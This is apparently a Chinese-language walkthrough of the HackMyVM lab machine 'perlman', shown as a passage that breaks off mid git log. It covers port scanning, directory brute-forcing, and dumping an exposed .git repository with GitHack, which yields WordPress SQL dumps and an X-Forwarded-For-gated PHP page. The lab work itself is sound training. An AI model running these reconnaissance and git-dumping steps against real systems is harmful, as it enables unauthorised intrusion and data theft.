![\"image-20240710134639726\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746957.png\")
<\/div>\n
![\"image-20240711094431031\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746959.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.176:22\nOpen 192.168.0.176:25\nOpen 192.168.0.176:110\nOpen 192.168.0.176:119\nOpen 192.168.0.176:80\nOpen 192.168.0.176:995\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 f0:f4:7d:ad:5d:2a:25:ec:17:b5:62:b0:2e:a5:8d:4f (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2DYUfsVcKnbknL8l\/3obgwbwPStIpVR69RgIvubPxz0GPaYH5n9yPnria4TVmKwzkUMCmxNlfG9\/a6Fgzdom07H7eIhUAIXHOWjmq+bowp14aMEopOtizr3M7DpU5Ye46KeSy97Yu+x0bjn+6wcI+LPZudp8GSdel4324PZ4kLH5NXM4LIQygvJjQ5CIArZv2YiEDeTtDSIde90SZoIN+XcJ0+J+jzqIAJZmeT7Gqf62fj5ti\/koi9sQzTjvCpDdWjAtiKEOkP1vonyM5MlGIL\/V0+f78crS2JmSfeiKN3hTr7wRSwPBZvoDbVCiz92IgAHzxjpy5uzBTp6gY5V4wBIZhP5JGBnn3rJsvPH5T8Vr6pe4IfJ+z398b+ogyobbrJNv3aiD2u4RegviVE6r8mSBPLbKA1mIgy5qA8SHpJibKJp6+gdG0k0QcH4kBMdDNggIsuN8FxcX2CeT\/qoGOeg+KXvUrA2LDFyuVcWN9t2T6z1eA+QsPjpodmNGbOpU=\n| 256 f1:d8:01:07:9f:d7:8d:2e:da:a4:9f:36:a2:ff:2a:df (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPJwZhipbadeNNxszKG3A83dRK+orUlQ0hAZtAHH5XFrJYUYW3KTAsXHfb54rCCXQApecmcQGj\/wsWX5Udced9k=\n| 256 91:02:29:33:c5:ff:2d:d8:63:b8:47:f3:f3:d8:79:ac (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBssx4VcQhzif7T2mibWNJYqgXRDUbndkYiBGfm3XCt4\n25\/tcp open smtp syn-ack Postfix smtpd\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=perlman\n| Subject Alternative Name: DNS:perlman\n| Issuer: commonName=perlman\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2022-07-02T10:12:39\n| Not valid after: 2032-06-29T10:12:39\n| MD5: 1ac5:1a22:67a7:a9bc:71fd:5f87:af54:5639\n| SHA-1: c609:bc84:2ece:7080:8d0e:d169:d81c:f369:b50f:24ac\n| -----BEGIN CERTIFICATE-----\n| MIIC0zCCAbugAwIBAgIUYyfZ7xaEw82UQOeqR51M7iVeTFkwDQYJKoZIhvcNAQEL\n| BQAwEjEQMA4GA1UEAwwHcGVybG1hbjAeFw0yMjA3MDIxMDEyMzlaFw0zMjA2Mjkx\n| MDEyMzlaMBIxEDAOBgNVBAMMB3BlcmxtYW4wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCZHxEKTHH6Z\/ITuPkv5F2WPEYFpFPkXHsYjBXMTUBU4fnlCGKI\n| EvYMwEJ0r7IkYxnS4ilg8nbmmZ\/fJ71y5mAMPm0hp2KVxeiuxrt8FNdzhzXYuhnX\n| izlgDDEPDY5BmUCTbyjTfiyMliMO\/129VT0uatRXmiOA+HdVIMrQjdKeXrREK7jJ\n| ELYOKMOmP5ChuGlHFup+Q2s9MbxghvX6kfXqYI7jDSWBghPZ1QUMXN5wg+Ke6qzC\n| cD53CZWckw18kn9GUtU97Wnya7R1vnd0Mq+8YEs3nSSV0GXjHscNugHGHQdcgFWg\n| tAGCSOxexcr1aS\/NyuO5pKcWJc02+G4jo1hRAgMBAAGjITAfMAkGA1UdEwQCMAAw\n| EgYDVR0RBAswCYIHcGVybG1hbjANBgkqhkiG9w0BAQsFAAOCAQEAihWPgk7Hbdmp\n| kjybLZgjXyVnQsLWr\/+KZOYnPiRfrPAIWkmdZFN6BvOTB0qq+bvaYYDZJ4NtVLcc\n| sYZGwZKicE2yqr0ZI11RlBCWy5M+0\/UfDf7f4JHl5FN27LTF4wGpgQitOV9B93OC\n| MKqQYpf\/NiNrC9j7GQZtAW30ID907jY0icdNz1\/r+7vQOLQDJu8Xjmopi+BCNtzP\n| \/L21NQAZwST4l07L0Aj5SemlljRZvlqecd2QxhmyRu0Y6CPpamtWxxpRDN4LYHaa\n| gZMY6SJ9Q79QNnF1L+CI1Ups9MpcjQoBZm2s5nJ24B7r1YczG6YtsTR6qgqnMnqr\n| LU3nfj\/LUw==\n|_-----END CERTIFICATE-----\n|_smtp-commands: perlman.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n80\/tcp open http syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-title: Sync - Mobile App Landing Page HTML Template\n| http-git: \n| 192.168.0.176:80\/.git\/\n| Git repository found!\n| Repository description: Unnamed repository; edit this file 'description' to name the...\n|_ Last commit message: wp \n|_http-favicon: Unknown favicon MD5: 1BD511222AD00F8970D00AFDCF215F9B\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: Apache\/2.4.54 (Debian)\n110\/tcp open pop3 syn-ack Dovecot pop3d\n|_pop3-capabilities: SASL(PLAIN) USER PIPELINING STLS RESP-CODES UIDL TOP CAPA AUTH-RESP-CODE\n| ssl-cert: Subject: commonName=perlman\n| Subject Alternative Name: DNS:perlman\n| Issuer: commonName=perlman\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2022-07-02T10:12:39\n| Not valid after: 2032-06-29T10:12:39\n| MD5: 1ac5:1a22:67a7:a9bc:71fd:5f87:af54:5639\n| SHA-1: c609:bc84:2ece:7080:8d0e:d169:d81c:f369:b50f:24ac\n| -----BEGIN CERTIFICATE-----\n| MIIC0zCCAbugAwIBAgIUYyfZ7xaEw82UQOeqR51M7iVeTFkwDQYJKoZIhvcNAQEL\n| BQAwEjEQMA4GA1UEAwwHcGVybG1hbjAeFw0yMjA3MDIxMDEyMzlaFw0zMjA2Mjkx\n| MDEyMzlaMBIxEDAOBgNVBAMMB3BlcmxtYW4wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCZHxEKTHH6Z\/ITuPkv5F2WPEYFpFPkXHsYjBXMTUBU4fnlCGKI\n| EvYMwEJ0r7IkYxnS4ilg8nbmmZ\/fJ71y5mAMPm0hp2KVxeiuxrt8FNdzhzXYuhnX\n| izlgDDEPDY5BmUCTbyjTfiyMliMO\/129VT0uatRXmiOA+HdVIMrQjdKeXrREK7jJ\n| ELYOKMOmP5ChuGlHFup+Q2s9MbxghvX6kfXqYI7jDSWBghPZ1QUMXN5wg+Ke6qzC\n| cD53CZWckw18kn9GUtU97Wnya7R1vnd0Mq+8YEs3nSSV0GXjHscNugHGHQdcgFWg\n| tAGCSOxexcr1aS\/NyuO5pKcWJc02+G4jo1hRAgMBAAGjITAfMAkGA1UdEwQCMAAw\n| EgYDVR0RBAswCYIHcGVybG1hbjANBgkqhkiG9w0BAQsFAAOCAQEAihWPgk7Hbdmp\n| kjybLZgjXyVnQsLWr\/+KZOYnPiRfrPAIWkmdZFN6BvOTB0qq+bvaYYDZJ4NtVLcc\n| sYZGwZKicE2yqr0ZI11RlBCWy5M+0\/UfDf7f4JHl5FN27LTF4wGpgQitOV9B93OC\n| MKqQYpf\/NiNrC9j7GQZtAW30ID907jY0icdNz1\/r+7vQOLQDJu8Xjmopi+BCNtzP\n| \/L21NQAZwST4l07L0Aj5SemlljRZvlqecd2QxhmyRu0Y6CPpamtWxxpRDN4LYHaa\n| gZMY6SJ9Q79QNnF1L+CI1Ups9MpcjQoBZm2s5nJ24B7r1YczG6YtsTR6qgqnMnqr\n| LU3nfj\/LUw==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n119\/tcp open nntp syn-ack InterNetNews (INN) 2.6.4\n995\/tcp open ssl\/pop3 syn-ack Dovecot pop3d\n| ssl-cert: Subject: commonName=perlman\n| Subject Alternative Name: DNS:perlman\n| Issuer: commonName=perlman\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2022-07-02T10:12:39\n| Not valid after: 2032-06-29T10:12:39\n| MD5: 1ac5:1a22:67a7:a9bc:71fd:5f87:af54:5639\n| SHA-1: c609:bc84:2ece:7080:8d0e:d169:d81c:f369:b50f:24ac\n| -----BEGIN CERTIFICATE-----\n| MIIC0zCCAbugAwIBAgIUYyfZ7xaEw82UQOeqR51M7iVeTFkwDQYJKoZIhvcNAQEL\n| BQAwEjEQMA4GA1UEAwwHcGVybG1hbjAeFw0yMjA3MDIxMDEyMzlaFw0zMjA2Mjkx\n| MDEyMzlaMBIxEDAOBgNVBAMMB3BlcmxtYW4wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCZHxEKTHH6Z\/ITuPkv5F2WPEYFpFPkXHsYjBXMTUBU4fnlCGKI\n| EvYMwEJ0r7IkYxnS4ilg8nbmmZ\/fJ71y5mAMPm0hp2KVxeiuxrt8FNdzhzXYuhnX\n| izlgDDEPDY5BmUCTbyjTfiyMliMO\/129VT0uatRXmiOA+HdVIMrQjdKeXrREK7jJ\n| ELYOKMOmP5ChuGlHFup+Q2s9MbxghvX6kfXqYI7jDSWBghPZ1QUMXN5wg+Ke6qzC\n| cD53CZWckw18kn9GUtU97Wnya7R1vnd0Mq+8YEs3nSSV0GXjHscNugHGHQdcgFWg\n| tAGCSOxexcr1aS\/NyuO5pKcWJc02+G4jo1hRAgMBAAGjITAfMAkGA1UdEwQCMAAw\n| EgYDVR0RBAswCYIHcGVybG1hbjANBgkqhkiG9w0BAQsFAAOCAQEAihWPgk7Hbdmp\n| kjybLZgjXyVnQsLWr\/+KZOYnPiRfrPAIWkmdZFN6BvOTB0qq+bvaYYDZJ4NtVLcc\n| sYZGwZKicE2yqr0ZI11RlBCWy5M+0\/UfDf7f4JHl5FN27LTF4wGpgQitOV9B93OC\n| MKqQYpf\/NiNrC9j7GQZtAW30ID907jY0icdNz1\/r+7vQOLQDJu8Xjmopi+BCNtzP\n| \/L21NQAZwST4l07L0Aj5SemlljRZvlqecd2QxhmyRu0Y6CPpamtWxxpRDN4LYHaa\n| gZMY6SJ9Q79QNnF1L+CI1Ups9MpcjQoBZm2s5nJ24B7r1YczG6YtsTR6qgqnMnqr\n| LU3nfj\/LUw==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n|_pop3-capabilities: USER SASL(PLAIN) UIDL RESP-CODES TOP PIPELINING CAPA AUTH-RESP-CODE\nService Info: Hosts: perlman.hmv, server.example.net; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u53d1\u73b0\u4e86.git<\/code>\u63a5\u7740\u770b\uff1a<\/p>\n\u76ee\u5f55\u7206\u7834<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html -q\n\/.html (Status: 403) [Size: 278]\n\/.php (Status: 403) [Size: 278]\n\/index.html (Status: 200) [Size: 47426]\n\/images (Status: 301) [Size: 315] [--> http:\/\/192.168.0.176\/images\/]\n\/css (Status: 301) [Size: 312] [--> http:\/\/192.168.0.176\/css\/]\n\/privacy-policy.html (Status: 200) [Size: 25624]\n\/js (Status: 301) [Size: 311] [--> http:\/\/192.168.0.176\/js\/]\n\/terms-conditions.html (Status: 200) [Size: 18494]\n\/.php (Status: 403) [Size: 278]\n\/.html (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]<\/code><\/pre>\n\u9ed8\u8ba4\u7684\u90a3\u4e2a\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code>\u5b57\u5178\u626b\u4e0d\u51fa\u6765git\uff0c\u5c1d\u8bd5\u6362\u4e2a\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ sudo dirsearch -u http:\/\/$IP\/ -e* -i 200,300-399 2>\/dev\/null\n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/perlman\/reports\/http_192.168.0.176\/__24-07-10_21-48-31.txt\n\nTarget: http:\/\/192.168.0.176\/\n\n[21:48:31] Starting: \n[21:48:32] 301 - 311B - \/js -> http:\/\/192.168.0.176\/js\/\n[21:48:40] 200 - 73B - \/.git\/description\n[21:48:40] 200 - 0B - \/.git\/\n[21:48:40] 200 - 23B - \/.git\/HEAD\n[21:48:40] 301 - 313B - \/.git -> http:\/\/192.168.0.176\/.git\/\n[21:48:40] 200 - 412B - \/.git\/branches\/\n[21:48:40] 200 - 92B - \/.git\/config\n[21:48:40] 200 - 673B - \/.git\/hooks\/\n[21:48:41] 200 - 409B - \/.git\/logs\/HEAD\n[21:48:41] 200 - 483B - \/.git\/logs\/\n[21:48:40] 200 - 3B - \/.git\/COMMIT_EDITMSG\n[21:48:41] 200 - 459B - \/.git\/info\/\n[21:48:41] 200 - 240B - \/.git\/info\/exclude\n[21:48:41] 301 - 323B - \/.git\/logs\/refs -> http:\/\/192.168.0.176\/.git\/logs\/refs\/\n[21:48:41] 200 - 409B - \/.git\/logs\/refs\/heads\/master\n[21:48:41] 200 - 463B - \/.git\/refs\/\n[21:48:41] 301 - 329B - \/.git\/logs\/refs\/heads -> http:\/\/192.168.0.176\/.git\/logs\/refs\/heads\/\n[21:48:41] 301 - 323B - \/.git\/refs\/tags -> http:\/\/192.168.0.176\/.git\/refs\/tags\/\n[21:48:41] 301 - 324B - \/.git\/refs\/heads -> http:\/\/192.168.0.176\/.git\/refs\/heads\/\n[21:48:41] 200 - 2KB - \/.git\/index\n[21:48:41] 200 - 41B - \/.git\/refs\/heads\/master\n[21:48:41] 200 - 690B - \/.git\/objects\/\n[21:51:12] 301 - 312B - \/css -> http:\/\/192.168.0.176\/css\/\n[21:52:09] 200 - 898B - \/images\/\n[21:52:10] 301 - 315B - \/images -> http:\/\/192.168.0.176\/images\/\n[21:52:24] 200 - 578B - \/js\/\n\nTask Completed<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240711095116673\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\ngit\u6cc4\u9732<\/h3>\n
\u4e00\u773c\u770b\u5230git\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6cc4\u9732\u4e86\u54ea\u4e9b\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ python2 \/home\/kali\/GitHack\/GitHack.py http:\/\/$IP\/.git\/ \n\n ____ _ _ _ _ _\n \/ ___(_) |_| | | | __ _ ___| | __\n| | _| | __| |_| |\/ _` |\/ __| |\/ \/\n| |_| | | |_| _ | (_| | (__| <\n \\____|_|\\__|_| |_|\\__,_|\\___|_|\\_\\{0.0.5}\n A '.git' folder disclosure exploit.\n\n[*] Check Depends\n[+] Check depends end\n[*] Set Paths\n[*] Target Url: http:\/\/192.168.0.176\/.git\/\n[*] Initialize Target\n[*] Try to Clone straightly\n[*] Clone\nCloning into '\/home\/kali\/GitHack\/dist\/192.168.0.176'...\nfatal: repository 'http:\/\/192.168.0.176\/.git\/' not found\n[-] Clone Error\n[*] Try to Clone with Directory Listing\n[*] http:\/\/192.168.0.176\/.git\/ is not support Directory Listing\n[-] [Skip][First Try] Target is not support Directory Listing\n[*] Try to clone with Cache\n[*] Initialize Git\n[!] Initialize Git Error: hint: Using 'master' as the name for the initial branch. This default branch name\nhint: is subject to change. To configure the initial branch name to use in all\nhint: of your new repositories, which will suppress this warning, call:\nhint: \nhint: git config --global init.defaultBranch <name>\nhint: \nhint: Names commonly chosen instead of 'master' are 'main', 'trunk' and\nhint: 'development'. The just-created branch can be renamed via this command:\nhint: \nhint: git branch -m <name>\n\n[*] Cache files\n[*] packed-refs\n[*] config\n[*] HEAD\n[*] COMMIT_EDITMSG\n[*] ORIG_HEAD\n[*] FETCH_HEAD\n[*] refs\/heads\/master\n[*] refs\/remote\/master\n[*] index\n[*] logs\/HEAD\n[*] logs\/refs\/heads\/master\n[*] Fetch Commit Objects\n[*] objects\/40\/f3ff4215a1102c35447533676797ec06f8ffd9\n[*] objects\/70\/8220d31a540e356d8fd63fa1cc3d066199109a\n[*] objects\/0c\/f1c46eefb7c5ebaf8d066e0b5cd730d7c8c58f\n[*] objects\/ad\/422b39a4cdc8b5541a34c73756fe9c7ea87341\n[*] objects\/fb\/435af2cb9880a1b016c9d268a772587f15b01f\n[*] objects\/03\/9117dcf7eb7728a1e743d8b88ae88ed9f5f1cf\n[*] objects\/46\/2a3534e258daf09a0d2d9f324674c913dcbe31\n[*] objects\/90\/fc1a09cda9208e4d85cb62f0017cd3ebaf54e8\n[*] objects\/d5\/16536b94baeafb5ee6396a9d8b915a2ca5d399\n[*] objects\/f6\/cec0bc7daea37ac9e9c488d16a982d5f5b2c6d\n[*] objects\/78\/d1e9f6d53308ac6604cea994700c6df88da6f4\n[*] objects\/8b\/0d7de5c057dce3ab17d99e7766008c783bc287\n[*] objects\/81\/ecb6e0365bb60b6324d7b90f17df3fe949ccab\n[*] objects\/ad\/3f4525e7ceaba5e7af542d1dfd0ef6abb6b0a0\n[*] objects\/15\/8c826eec8513cc3eb8f9b9cfece64b73ecb256\n[*] objects\/00\/933018b10d9015482170a1b4b11611407334ba\n[*] objects\/8a\/5646ddca34e046cc2f172d98ce29d00ea39b63\n[*] objects\/d0\/1f63dba38e3e1d317502ec1d3cc6dd2d32cc7b\n[*] objects\/14\/424894c70ea1e64d3caf3bf7d24146a5a7b62d\n[*] objects\/1b\/6cc566a580516af2ae08b0e18cc30b7257d85c\n[*] objects\/43\/89ca985f8f6a8381bdeed57b0f678862b9c358\n[*] objects\/03\/d2ecd9e468cf069c51600ecbe13cf48136abe5\n[*] objects\/7e\/4c0667750620966b07dd4f3548cf04a43d9ffc\n[*] objects\/14\/5d3f7b92190c61bc700e06cac301867c912ead\n[*] objects\/a7\/4a3ab9c8047c8b96522ccc9554f2d8d9d7c37b\n[*] objects\/7c\/c33f9ce2b2b70d6ee3e4ca77db0305ba5b58a7\n[*] objects\/02\/2e935047123ce265a42a7d58a9e4d4fb8d59c9\n[*] objects\/87\/057e525b9791571806e63244bcf7c710d56ac0\n[*] objects\/7f\/e7dd389a3e63bb67ed90853c58a97c5a89d66c\n[*] objects\/d2\/9e54424558256922c83396a320ff7fec2a81dc\n[*] objects\/df\/304da7158234a923bb717fc72be3c20e2864b3\n[*] objects\/11\/c0725279f8dedf58b47412ba9faa5f6282c46a\n[*] objects\/57\/2f66c0aa68b1bbca2e73f6fc47b6dcf63d8d72\n[*] Fetch Commit Objects End\n[*] logs\/refs\/remote\/master\n[*] logs\/refs\/stash\n[*] refs\/stash\n[*] Valid Repository\n[+] Valid Repository Success\n\n[+] Clone Success. Dist File : \/home\/kali\/GitHack\/dist\/192.168.0.176<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176]\n\u2514\u2500$ ls -la\ntotal 1212\ndrwxr-xr-x 4 kali kali 4096 Jul 10 22:00 .\ndrwxr-xr-x 4 kali kali 4096 Jul 10 22:00 ..\n-rw-r--r-- 1 kali kali 2144 Jul 10 22:00 commentmeta.sql\n-rw-r--r-- 1 kali kali 3538 Jul 10 22:00 comments.sql\ndrwxr-xr-x 2 kali kali 4096 Jul 10 22:00 db\ndrwxr-xr-x 8 kali kali 4096 Jul 10 22:00 .git\n-rw-r--r-- 1 kali kali 2720 Jul 10 22:00 links.sql\n-rw-r--r-- 1 kali kali 1082657 Jul 10 22:00 options.sql\n-rw-r--r-- 1 kali kali 2502 Jul 10 22:00 postmeta.sql\n-rw-r--r-- 1 kali kali 13542 Jul 10 22:00 posts.sql\n-rw-r--r-- 1 kali kali 2713 Jul 10 22:00 tcp_addresses.sql\n-rw-r--r-- 1 kali kali 24292 Jul 10 22:00 tcp_countries.sql\n-rw-r--r-- 1 kali kali 11572 Jul 10 22:00 tcp_currencies.sql\n-rw-r--r-- 1 kali kali 2051 Jul 10 22:00 tcp_orders_costsmeta.sql\n-rw-r--r-- 1 kali kali 2121 Jul 10 22:00 tcp_orders_costs.sql\n-rw-r--r-- 1 kali kali 2067 Jul 10 22:00 tcp_orders_detailsmeta.sql\n-rw-r--r-- 1 kali kali 2633 Jul 10 22:00 tcp_orders_details.sql\n-rw-r--r-- 1 kali kali 2003 Jul 10 22:00 tcp_ordersmeta.sql\n-rw-r--r-- 1 kali kali 4133 Jul 10 22:00 tcp_orders.sql\n-rw-r--r-- 1 kali kali 2055 Jul 10 22:00 tcp_rel_entities.sql\n-rw-r--r-- 1 kali kali 1905 Jul 10 22:00 tcp_taxes.sql\n-rw-r--r-- 1 kali kali 2196 Jul 10 22:00 tcp_tax_rates.sql\n-rw-r--r-- 1 kali kali 2114 Jul 10 22:00 termmeta.sql\n-rw-r--r-- 1 kali kali 2162 Jul 10 22:00 term_relationships.sql\n-rw-r--r-- 1 kali kali 2247 Jul 10 22:00 terms.sql\n-rw-r--r-- 1 kali kali 2446 Jul 10 22:00 term_taxonomy.sql\n-rw-r--r-- 1 kali kali 3943 Jul 10 22:00 usermeta.sql\n-rw-r--r-- 1 kali kali 2763 Jul 10 22:00 users.sql\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176]\n\u2514\u2500$ cat users.sql \n-- MariaDB dump 10.19 Distrib 10.5.15-MariaDB, for debian-linux-gnu (x86_64)\n--\n-- Host: localhost Database: wordpressdb\n-- ------------------------------------------------------\n-- Server version 10.5.15-MariaDB-0+deb11u1\n\n\/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION *\/;\n\/*!40101 SET NAMES utf8mb4 *\/;\n\/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE *\/;\n\/*!40103 SET TIME_ZONE='+00:00' *\/;\n\/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 *\/;\n\/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 *\/;\n\/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' *\/;\n\/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 *\/;\n\n--\n-- Table structure for table `users`\n--\n\nDROP TABLE IF EXISTS `users`;\n\/*!40101 SET @saved_cs_client = @@character_set_client *\/;\n\/*!40101 SET character_set_client = utf8 *\/;\nCREATE TABLE `users` (\n `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,\n `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',\n `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_status` int(11) NOT NULL DEFAULT 0,\n `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n PRIMARY KEY (`ID`),\n KEY `user_login_key` (`user_login`),\n KEY `user_nicename` (`user_nicename`),\n KEY `user_email` (`user_email`)\n) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n--\n-- Dumping data for table `users`\n--\n\nLOCK TABLES `users` WRITE;\n\/*!40000 ALTER TABLE `users` DISABLE KEYS *\/;\nINSERT INTO `users` VALUES (1,'webmaster','','webmaster','webmaster@perlman.hmv','http:\/\/perlman.hmv','2022-07-03 16:23:02','',0,'webmaster');\n\/*!40000 ALTER TABLE `users` ENABLE KEYS *\/;\nUNLOCK TABLES;\n\/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;\n\n\/*!40101 SET SQL_MODE=@OLD_SQL_MODE *\/;\n\/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS *\/;\n\/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS *\/;\n\/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION *\/;\n\/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES *\/;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176]\n\u2514\u2500$ cd db \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ ls -la\ntotal 12\ndrwxr-xr-x 2 kali kali 4096 Jul 10 22:00 .\ndrwxr-xr-x 4 kali kali 4096 Jul 10 22:00 ..\n-rw-r--r-- 1 kali kali 305 Jul 10 22:00 index.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ cat index.php \n<?php\n\n error_reporting(0);\n $allow = ['perlman', 'perlman.htb'];\n if(!isset($_SERVER['HTTP_X_FORWARDED_FOR']) || !in_array($_SERVER['HTTP_X_FORWARDED_FOR'], $allow)) {\n die('Access allowed only for perlman.htb staff.');\n } else {\n header('location: old_backup_2009');\n\n }\n\n?><\/code><\/pre>\n\u627e\u5230\u4e86\u4e00\u4e2a\u57df\u540d\u89e3\u6790http:\/\/perlman.hmv<\/code>\u4ee5\u53ca\u627e\u4e0d\u5230\u5bc6\u7801\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5386\u53f2\u6570\u636e\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ git log \ncommit 40f3ff4215a1102c35447533676797ec06f8ffd9 (HEAD -> master)\nAuthor: root <root@perlman>\nDate: Sat Sep 10 15:30:23 2022 +0200\n\n wp\n\ncommit 0cf1c46eefb7c5ebaf8d066e0b5cd730d7c8c58f\nAuthor: root <root@perlman>\nDate: Sat Sep 10 15:29:12 2022 +0200\n\n config\n\ncommit d29e54424558256922c83396a320ff7fec2a81dc\nAuthor: root <root@perlman>\nDate: Sat Sep 10 15:28:36 2022 +0200\n\n 